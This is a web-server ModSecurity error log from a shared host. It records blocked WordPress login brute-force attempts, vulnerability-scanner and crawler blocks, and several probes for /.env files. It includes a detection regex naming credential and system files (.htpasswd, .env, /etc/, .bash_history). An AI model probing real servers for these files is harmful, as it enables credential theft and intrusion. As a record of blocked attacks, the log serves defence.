[Tue May 26 19:24:46.426864 2026] [security2:error] [pid 49598:tid 49673] [remote 216.73.216.30:8206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmJuzJzkdc0WtdrwtB8AAAvUo"]
[Tue May 26 19:24:47.812784 2026] [security2:error] [pid 49598:tid 49752] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmJ-zJzkdc0WtdrwtCEgAAAJ0"]
[Tue May 26 19:24:48.388873 2026] [security2:error] [pid 49598:tid 49733] [client 114.119.153.242:61357] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.bloggertarget.com"] [uri "/what-is-broken-link-in-website"] [unique_id "ahWmKOzJzkdc0WtdrwtCMwAAAIo"], referer: http://bloggertarget.com/
[Tue May 26 19:24:49.497656 2026] [security2:error] [pid 49598:tid 49758] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmKezJzkdc0WtdrwtCQgAAAKM"]
[Tue May 26 19:24:50.530900 2026] [security2:error] [pid 49598:tid 49681] [remote 31.24.155.180:36802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmKuzJzkdc0WtdrwtCWwAAzFI"]
[Tue May 26 19:24:51.626017 2026] [autoindex:error] [pid 49598:tid 49828] [client 49.51.33.159:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:24:51.691957 2026] [security2:error] [pid 49598:tid 49687] [remote 216.73.216.30:32092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmK-zJzkdc0WtdrwtCdwAAx1g"]
[Tue May 26 19:24:52.322063 2026] [security2:error] [pid 49598:tid 49800] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmK-zJzkdc0WtdrwtCfAAAAM0"]
[Tue May 26 19:24:52.829264 2026] [security2:error] [pid 49598:tid 49825] [client 47.128.42.189:59516] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "christinaspromotions.com"] [uri "/robots.txt"] [unique_id "ahWmLOzJzkdc0WtdrwtCjgAAAOY"]
[Tue May 26 19:24:53.953137 2026] [security2:error] [pid 49598:tid 49694] [remote 5.42.158.148:33832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWmLezJzkdc0WtdrwtCpgAAu18"]
[Tue May 26 19:24:54.264939 2026] [security2:error] [pid 49598:tid 49745] [client 139.180.229.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmLuzJzkdc0WtdrwtCtgAAAJY"], referer: https://www.anujtradingco.com/
[Tue May 26 19:24:54.566278 2026] [security2:error] [pid 49598:tid 49768] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmLuzJzkdc0WtdrwtCsgAAAK0"]
[Tue May 26 19:24:55.014276 2026] [security2:error] [pid 49598:tid 49696] [remote 31.24.155.180:36802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmLuzJzkdc0WtdrwtCyAAAsmE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:24:55.236053 2026] [security2:error] [pid 49598:tid 49697] [remote 8.130.10.226:51732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.10.130.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWmL-zJzkdc0WtdrwtCyQAAy2I"]
[Tue May 26 19:24:55.522115 2026] [security2:error] [pid 49598:tid 49810] [client 139.180.229.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmL-zJzkdc0WtdrwtC1gAAANc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1244943&moderation-hash=9638e1b26cf6f7ba1053a7d653c10288
[Tue May 26 19:24:56.675134 2026] [security2:error] [pid 49598:tid 49745] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmMOzJzkdc0WtdrwtC7AAAAJY"]
[Tue May 26 19:24:56.898673 2026] [security2:error] [pid 49598:tid 49793] [client 176.65.139.232:65162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "lodgerajasabai212.svijaykumar.in"] [uri "/.env"] [unique_id "ahWmMOzJzkdc0WtdrwtC_wAAAMY"]
[Tue May 26 19:24:57.172297 2026] [security2:error] [pid 49598:tid 49728] [client 176.65.139.238:37290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWmMezJzkdc0WtdrwtDEQAAAIU"]
[Tue May 26 19:24:59.097252 2026] [security2:error] [pid 49598:tid 49728] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmMuzJzkdc0WtdrwtDQAAAAIU"]
[Tue May 26 19:25:00.083983 2026] [security2:error] [pid 49598:tid 49721] [remote 65.2.90.30:42000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWmM-zJzkdc0WtdrwtDZAAA-Ho"]
[Tue May 26 19:25:01.271267 2026] [security2:error] [pid 49598:tid 49761] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmNOzJzkdc0WtdrwtDdQAAAKY"]
[Tue May 26 19:25:01.435937 2026] [security2:error] [pid 49598:tid 49720] [remote 216.73.216.30:32092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmNezJzkdc0WtdrwtDiwAA_3k"]
[Tue May 26 19:25:03.086338 2026] [security2:error] [pid 49598:tid 49818] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmNuzJzkdc0WtdrwtDrwAAAN8"]
[Tue May 26 19:25:03.361114 2026] [security2:error] [pid 49598:tid 49608] [remote 217.112.89.35:37504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWmN-zJzkdc0WtdrwtDwwAArAk"]
[Tue May 26 19:25:04.820311 2026] [security2:error] [pid 49598:tid 49611] [remote 45.79.189.31:31368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWmOOzJzkdc0WtdrwtD5QAA8Qw"]
[Tue May 26 19:25:05.654400 2026] [security2:error] [pid 49598:tid 49766] [client 31.57.184.107:64354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.usteve.com.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWmOezJzkdc0WtdrwtEEAAAAKs"], referer: https://www.facebook.com/
[Tue May 26 19:25:05.832762 2026] [security2:error] [pid 49598:tid 49851] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmOezJzkdc0WtdrwtEDAAAAQA"]
[Tue May 26 19:25:06.000764 2026] [security2:error] [pid 49598:tid 49799] [client 27.62.134.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmOezJzkdc0WtdrwtEEwAAAMw"]
[Tue May 26 19:25:06.437392 2026] [security2:error] [pid 49598:tid 49616] [remote 216.73.216.30:32092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmOuzJzkdc0WtdrwtELQAA_hE"]
[Tue May 26 19:25:07.995070 2026] [security2:error] [pid 49598:tid 49829] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmO-zJzkdc0WtdrwtETwAAAOo"]
[Tue May 26 19:25:09.553848 2026] [security2:error] [pid 49598:tid 49625] [remote 51.91.98.45:51102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmPezJzkdc0WtdrwtEfAAAoho"]
[Tue May 26 19:25:10.029198 2026] [security2:error] [pid 49598:tid 49622] [remote 51.91.98.45:51102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmPezJzkdc0WtdrwtEhAAA3hc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:25:10.247966 2026] [security2:error] [pid 49598:tid 49633] [remote 173.212.233.81:58548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWmPuzJzkdc0WtdrwtEjAAA9CI"]
[Tue May 26 19:25:10.412240 2026] [security2:error] [pid 49598:tid 49730] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmPuzJzkdc0WtdrwtEigAAAIc"]
[Tue May 26 19:25:11.720906 2026] [security2:error] [pid 49598:tid 49635] [remote 216.73.216.30:61212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmP-zJzkdc0WtdrwtExgAAoSQ"]
[Tue May 26 19:25:12.041516 2026] [security2:error] [pid 49598:tid 49839] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmP-zJzkdc0WtdrwtExAAAAPQ"]
[Tue May 26 19:25:12.978590 2026] [security2:error] [pid 49598:tid 49641] [remote 173.212.233.81:58548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWmQOzJzkdc0WtdrwtE5wAAzSo"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 19:25:14.065559 2026] [security2:error] [pid 49598:tid 49610] [remote 51.91.98.45:32906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmQezJzkdc0WtdrwtE_wAAnAs"]
[Tue May 26 19:25:14.626958 2026] [security2:error] [pid 49598:tid 49656] [remote 51.91.98.45:32906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmQuzJzkdc0WtdrwtFEwAAuTk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:25:14.934524 2026] [security2:error] [pid 49598:tid 49658] [remote 103.166.184.148:44452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmQuzJzkdc0WtdrwtFFQAAyzs"]
[Tue May 26 19:25:15.299605 2026] [security2:error] [pid 49598:tid 49843] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmQuzJzkdc0WtdrwtFGwAAAPg"]
[Tue May 26 19:25:16.603535 2026] [security2:error] [pid 49598:tid 49753] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmROzJzkdc0WtdrwtFQAAAAJ4"]
[Tue May 26 19:25:17.056722 2026] [security2:error] [pid 49598:tid 49647] [remote 103.166.184.148:44452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmROzJzkdc0WtdrwtFVQAAnTA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:25:17.209423 2026] [security2:error] [pid 49598:tid 49783] [client 114.119.159.26:57989] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/etiket/hatay-web-tasarim"] [unique_id "ahWmRezJzkdc0WtdrwtFWQAAALw"], referer: https://www.cagmedya.com/referanslar/merter-lojistik
[Tue May 26 19:25:17.786962 2026] [security2:error] [pid 49598:tid 49816] [client 195.178.110.102:31258] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "srsglobalsoft.com"] [uri "/action"] [unique_id "ahWmRezJzkdc0WtdrwtFYAAAAN0"]
[Tue May 26 19:25:17.787047 2026] [security2:error] [pid 49598:tid 49767] [client 195.178.110.102:31246] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "srsglobalsoft.com"] [uri "/action"] [unique_id "ahWmRezJzkdc0WtdrwtFYQAAAKw"]
[Tue May 26 19:25:17.787440 2026] [security2:error] [pid 49598:tid 49852] [client 195.178.110.102:31264] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "srsglobalsoft.com"] [uri "/action"] [unique_id "ahWmRezJzkdc0WtdrwtFYgAAAQE"]
[Tue May 26 19:25:17.791616 2026] [security2:error] [pid 49598:tid 49737] [client 195.178.110.102:31248] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "srsglobalsoft.com"] [uri "/action"] [unique_id "ahWmRezJzkdc0WtdrwtFYwAAAI4"]
[Tue May 26 19:25:17.791621 2026] [security2:error] [pid 49598:tid 49775] [client 195.178.110.102:31268] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "srsglobalsoft.com"] [uri "/action"] [unique_id "ahWmRezJzkdc0WtdrwtFZAAAALQ"]
[Tue May 26 19:25:18.135403 2026] [security2:error] [pid 49598:tid 49655] [remote 217.112.89.35:39480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWmRuzJzkdc0WtdrwtFaAAAwzg"]
[Tue May 26 19:25:18.388660 2026] [security2:error] [pid 49598:tid 49663] [remote 217.112.89.35:39480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWmRuzJzkdc0WtdrwtFcgAA50A"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:25:18.853985 2026] [security2:error] [pid 49598:tid 49760] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmRuzJzkdc0WtdrwtFdQAAAKU"]
[Tue May 26 19:25:21.028412 2026] [security2:error] [pid 49598:tid 49762] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmSOzJzkdc0WtdrwtFwAAAAKc"]
[Tue May 26 19:25:21.222282 2026] [security2:error] [pid 49598:tid 49679] [remote 74.91.224.220:54628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmSezJzkdc0WtdrwtFzAAAuVA"]
[Tue May 26 19:25:21.454019 2026] [security2:error] [pid 49598:tid 49643] [remote 216.73.216.30:61212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmSezJzkdc0WtdrwtF4AAA9yw"]
[Tue May 26 19:25:21.637164 2026] [security2:error] [pid 49598:tid 49792] [client 66.146.239.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmSezJzkdc0WtdrwtF5QAAAMU"], referer: https://www.anujtradingco.com/
